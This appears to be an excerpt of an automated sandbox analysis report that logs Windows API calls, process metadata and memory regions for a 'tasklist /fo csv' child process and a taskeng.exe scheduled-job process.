[0410.211] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist /fo csv ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x30ee50*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="tasklist /fo csv ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30ee00 | out: lpCommandLine="tasklist /fo csv ", lpProcessInformation=0x30ee00*(hProcess=0x5c, hThread=0x58, dwProcessId=0xe68, dwThreadId=0xec0)) returned 1
[0410.246] CloseHandle (hObject=0x58) returned 1
[0410.247] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0410.247] GetProcessHeap () returned 0x110000
[0410.247] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x128f90 | out: hHeap=0x110000) returned 1
[0410.247] GetEnvironmentStringsW () returned 0x128f90*
[0410.247] GetProcessHeap () returned 0x110000
[0410.247] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb78) returned 0x12b610
[0410.247] memcpy (in: _Dst=0x12b610, _Src=0x128f90, _Size=0xb78 | out: _Dst=0x12b610) returned 0x12b610
[0410.247] FreeEnvironmentStringsW (penv=0x128f90) returned 1
[0410.247] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0xffffffff) returned 0x0
[0417.893] GetExitCodeProcess (in: hProcess=0x5c, lpExitCode=0x30ed48 | out: lpExitCode=0x30ed48*=0x0) returned 1
[0417.894] CloseHandle (hObject=0x5c) returned 1
[0417.894] _vsnwprintf (in: _Buffer=0x30efb8, _BufferCount=0x13, _Format="%08X", _ArgList=0x30ed58 | out: _Buffer="00000000") returned 8
[0417.894] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0417.895] GetProcessHeap () returned 0x110000
[0417.895] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12b610 | out: hHeap=0x110000) returned 1
[0417.895] GetEnvironmentStringsW () returned 0x12cd40*
[0417.895] GetProcessHeap () returned 0x110000
[0417.895] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb9e) returned 0x12d8f0
[0417.895] memcpy (in: _Dst=0x12d8f0, _Src=0x12cd40, _Size=0xb9e | out: _Dst=0x12d8f0) returned 0x12d8f0
[0417.895] FreeEnvironmentStringsW (penv=0x12cd40) returned 1
[0417.895] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0417.895] GetProcessHeap () returned 0x110000
[0417.896] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d8f0 | out: hHeap=0x110000) returned 1
[0417.896] GetEnvironmentStringsW () returned 0x12cd40*
[0417.896] GetProcessHeap () returned 0x110000
[0417.896] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb9e) returned 0x12d8f0
[0417.896] memcpy (in: _Dst=0x12d8f0, _Src=0x12cd40, _Size=0xb9e | out: _Dst=0x12d8f0) returned 0x12d8f0
[0417.896] FreeEnvironmentStringsW (penv=0x12cd40) returned 1
[0417.896] GetProcessHeap () returned 0x110000
[0417.896] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x128640 | out: hHeap=0x110000) returned 1
[0417.896] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ee18 | out: lpAttributeList=0x30ee18)
[0417.896] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0417.900] _close (_FileHandle=3) returned 0
[0417.901] _get_osfhandle (_FileHandle=1) returned 0x7
[0417.901] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0417.901] _get_osfhandle (_FileHandle=1) returned 0x7
[0417.901] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1fe194 | out: lpMode=0x4a1fe194) returned 1
[0417.902] _get_osfhandle (_FileHandle=0) returned 0x3
[0417.902] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1fe198 | out: lpMode=0x4a1fe198) returned 1
[0417.903] SetConsoleInputExeNameW () returned 0x1
[0417.903] GetConsoleOutputCP () returned 0x1b5
[0417.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a20bfe0 | out: lpCPInfo=0x4a20bfe0) returned 1
[0417.903] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0417.904] exit (_Code=0)
Process:
id = "24"
image_name = "tasklist.exe"
filename = "c:\\windows\\system32\\tasklist.exe"
page_root = "0x225b5000"
os_pid = "0xe68"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "23"
os_parent_pid = "0xdb8"
cmd_line = "tasklist /fo csv "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3173
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3174
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3175
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3176
start_va = 0x150000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 3177
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3178
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 3179
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 3180
start_va = 0xffbe0000
end_va = 0xffbfdfff
monitored = 0
entry_point = 0xffbf36e4
region_type = mapped_file
name = "tasklist.exe"
filename = "\\Windows\\System32\\tasklist.exe" (normalized: "c:\\windows\\system32\\tasklist.exe")
Region:
id = 3181
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3182
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 3183
start_va = 0x7fffffdc000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 3184
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 3185
start_va = 0x1d0000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 3186
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3187
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3188
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3189
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 3190
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 3191
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 3192
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3200
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3201
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3202
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3203
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3204
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3205
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3206
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3207
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3208
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3209
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 3210
start_va = 0x7fefb1b0000
end_va = 0x7fefb1c7fff
monitored = 0
entry_point = 0x7fefb1b1010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 3211
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3212
start_va = 0x7fefd660000
end_va = 0x7fefd66afff
monitored = 0
entry_point = 0x7fefd661030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 3213
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3214
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 3215
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 3216
start_va = 0x7fef4dd0000
end_va = 0x7fef4e12fff
monitored = 0
entry_point = 0x7fef4df1b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 3217
start_va = 0x7fefba20000
end_va = 0x7fefba35fff
monitored = 0
entry_point = 0x7fefba211a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 3218
start_va = 0x7fefba10000
end_va = 0x7fefba1bfff
monitored = 0
entry_point = 0x7fefba118a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 3219
start_va = 0x7fefd5c0000
end_va = 0x7fefd5e2fff
monitored = 0
entry_point = 0x7fefd5c1198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 3220
start_va = 0x7fefb9f0000
end_va = 0x7fefba04fff
monitored = 0
entry_point = 0x7fefb9f1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 3221
start_va = 0x7fef3c30000
end_va = 0x7fef3d54fff
monitored = 0
entry_point = 0x7fef3c81570
region_type = mapped_file
name = "dbghelp.dll"
filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")
Region:
id = 3222
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3223
start_va = 0x350000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 3224
start_va = 0x350000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 3225
start_va = 0x4a0000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004a0000"
filename = ""
Region:
id = 3226
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3227
start_va = 0x4b0000
end_va = 0x637fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004b0000"
filename = ""
Region:
id = 3228
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3229
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3230
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3231
start_va = 0x640000
end_va = 0x7c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 3232
start_va = 0x7d0000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 3233
start_va = 0xc0000
end_va = 0xc3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tasklist.exe.mui"
filename = "\\Windows\\System32\\en-US\\tasklist.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\tasklist.exe.mui")
Region:
id = 3234
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 3235
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 3236
start_va = 0x1bd0000
end_va = 0x1d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bd0000"
filename = ""
Region:
id = 3237
start_va = 0x1bd0000
end_va = 0x1c8ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 3238
start_va = 0x1c90000
end_va = 0x1d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c90000"
filename = ""
Region:
id = 3239
start_va = 0x1d0000
end_va = 0x24cfff
monitored = 0
entry_point = 0x1dcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3240
start_va = 0x250000
end_va = 0x34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 3241
start_va = 0x1d0000
end_va = 0x24cfff
monitored = 0
entry_point = 0x1dcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3242
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 3243
start_va = 0x1ec0000
end_va = 0x1f3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ec0000"
filename = ""
Region:
id = 3244
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 3245
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 3246
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 3247
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 3248
start_va = 0x7fef9bd0000
end_va = 0x7fef9bddfff
monitored = 0
entry_point = 0x7fef9bd5500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 3249
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 0
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 3250
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 3251
start_va = 0x7fefd770000
end_va = 0x7fefd7acfff
monitored = 0
entry_point = 0x7fefd7718f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 3252
start_va = 0x1f40000
end_va = 0x220efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 3253
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 3254
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 3255
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 3256
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3257
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3258
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3259
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3260
start_va = 0x450000
end_va = 0x494fff
monitored = 0
entry_point = 0x451064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3261
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3262
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 3263
start_va = 0x2230000
end_va = 0x22affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 3264
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 3265
start_va = 0x2330000
end_va = 0x23affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002330000"
filename = ""
Region:
id = 3266
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 3267
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 3268
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 3269
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 3689
start_va = 0x7fef97d0000
end_va = 0x7fef97f0fff
monitored = 0
entry_point = 0x7fef97e03b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 3690
start_va = 0x110000
end_va = 0x114fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmiutils.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmiutils.dll.mui")
Thread:
id = 143
os_tid = 0xec0
Thread:
id = 144
os_tid = 0xed8
Thread:
id = 145
os_tid = 0xed4
Thread:
id = 146
os_tid = 0xec8
Thread:
id = 147
os_tid = 0xea4
Process:
id = "25"
image_name = "taskeng.exe"
filename = "c:\\windows\\system32\\taskeng.exe"
page_root = "0x792dd000"
os_pid = "0x4fc"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "created_scheduled_job"
parent_id = "13"
os_parent_pid = "0x370"
cmd_line = "taskeng.exe {58CB376B-B7C1-4AA2-A22D-0FDB9D0F5A07} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3808
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3809
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3810
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3811
start_va = 0x130000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 3812
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3813
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 3814
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 3815
start_va = 0xffa60000
end_va = 0xffad3fff
monitored = 0
entry_point = 0xffa6f44c
region_type = mapped_file
name = "taskeng.exe"
filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")
Region:
id = 3816
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
